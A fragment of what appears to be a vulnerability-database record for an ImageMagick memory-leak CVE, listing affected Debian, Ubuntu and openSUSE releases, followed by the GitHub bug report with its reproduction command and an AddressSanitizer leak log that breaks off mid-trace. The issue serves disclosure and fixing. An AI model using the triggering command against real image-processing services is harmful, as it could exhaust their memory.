"af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1616
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's memory leaks in MagickCore/memory.c:478:10 This issue is maybe related with [#1604](https://github.com/ImageMagick/ImageMagick/issues/1604). ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -quality 3 "(" magick:logo +repage ")" "(" magick:wizard +repage ")" -quiet -caption "%h%U" -compare -insert 2 tmp` Here's ASAN log. ``` ==22113==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c3e5114 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f9c4c3e96c9 in CloneImage MagickCore/image.c:823:25 #4 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #5 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #6 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #7 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 6553600 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c437f26 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f9c4c18061c in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7f9c4c186901 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7f9c4c16e330 in QueueAuthenticPixelCacheNexus MagickCore/cache.c:4156:28 #5 0x7f9c4c16e001 in GetAuthenticPixelCacheNexus MagickCore/cache.c:1324:10 #6 0x7f9c4c1909be in GetCacheViewAuthenticPixels MagickCore/cache-view.c:312:10 #7 0x7f9c4c3f83a1 in SetImageAlpha MagickCore/image.c:2372:7 #8 0x7f9c4c479695 in ConformPixelInfo MagickCore/pixel.c:235:12 #9 0x7f9c4c3ec4a7 in SetImageBackgroundColor MagickCore/image.c:2441:3 #10 0x7f9c4c5e88b5 in ExtentImage MagickCore/transform.c:1138:10 #11 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #12 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #13 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #14 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #15 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #16 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #17 0x526f95 in MagickMain utilities/magick.c:149:10 #18 0x5268e1 in main utilities/magick.c:180:10 #19 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 22616 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c3eaafd in CloneImage MagickCore/image.c:879:43 #4 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #5 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #6 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #7 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c3e5114 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f9c4c3e7753 in AcquireImageInfo MagickCore/image.c:350:28 #4 0x7f9c4c3f0513 in CloneImageInfo MagickCore/image.c:945:14 #5 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21 #6 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12 #7 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14 #8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 9152 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c437f26 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f9c4c16aa04 in AcquirePixelCache MagickCore/cache.c:195:28 #3 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28 #4 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22 #5 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #6 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #7 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #8 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #9 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 512 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c478f3a in AcquirePixelChannelMap MagickCore/pixel.c:101:35 #4 0x7f9c4c479114 in ClonePixelChannelMap MagickCore/pixel.c:139:13 #5 0x7f9c4c3ea34f in CloneImage MagickCore/image.c:849:28 #6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 288 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c148284 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f9c4c149d5d in CloneBlobInfo MagickCore/blob.c:554:27 #4 0x7f9c4c3ea808 in CloneImage MagickCore/image.c:867:25 #5 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #6 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #7 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #8 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #9 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 192 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c16b5df in AcquirePixelCacheNexus MagickCore/cache.c:271:29 #4 0x7f9c4c16af8d in AcquirePixelCache MagickCore/cache.c:212:26 #5 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28 #6 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22 #7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 96 byte(s) in 3 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c593033 in AddValueToSplayTree MagickCore/splay-tree.c:189:21 #3 0x7f9c4c593f3c in CloneSplayTree MagickCore/splay-tree.c:372:12 #4 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25 #5 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10 #6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c598084 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f9c4c594115 in NewSplayTree MagickCore/splay-tree.c:1148:32 #4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10 #7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c598084 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f9c4c594115 in NewSplayTree MagickCore/splay-tree.c:1148:32 #4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f9c4c16b383 in AcquirePixelCache MagickCore/cache.c:231:30 #4 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28 #5 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22 #6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f9c4c16b2f4 in AcquirePixelCache MagickCore/cache.c:229:25 #4 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28 #5 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22 #6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f9c4c594389 in NewSplayTree MagickCore/splay-tree.c:1159:25 #4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c437f26 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f9c4c16b4e2 in AcquirePixelCacheNexus MagickCore/cache.c:267:29 #3 0x7f9c4c16af8d in AcquirePixelCache MagickCore/cache.c:212:26 #4 0x7f9c4c16bf8d in ClonePixelCache MagickCore/cache.c:513:28 #5 0x7f9c4c3eb59f in CloneImage MagickCore/image.c:910:22 #6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 2 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c593033 in AddValueToSplayTree MagickCore/splay-tree.c:189:21 #3 0x7f9c4c593f3c in CloneSplayTree MagickCore/splay-tree.c:372:12 #4 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27 #5 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10 #6 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21 #7 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12 #8 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14 #9 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f9c4c3ea99f in CloneImage MagickCore/image.c:871:26 #4 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #5 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #6 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #7 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #8 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f9c4c14a1ae in GetBlobInfo MagickCore/blob.c:1745:24 #4 0x7f9c4c149d6a in CloneBlobInfo MagickCore/blob.c:555:3 #5 0x7f9c4c3ea808 in CloneImage MagickCore/image.c:867:25 #6 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #7 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #8 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #9 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f9c4c57d781 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f9c4c57cfc3 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f9c4c594389 in NewSplayTree MagickCore/splay-tree.c:1159:25 #4 0x7f9c4c593d24 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10 #7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 62 byte(s) in 3 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26 #4 0x7f9c4c593f26 in CloneSplayTree MagickCore/splay-tree.c:373:7 #5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10 #7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #11 0x7f9c4b9fda99 in ProcessCommandOptions 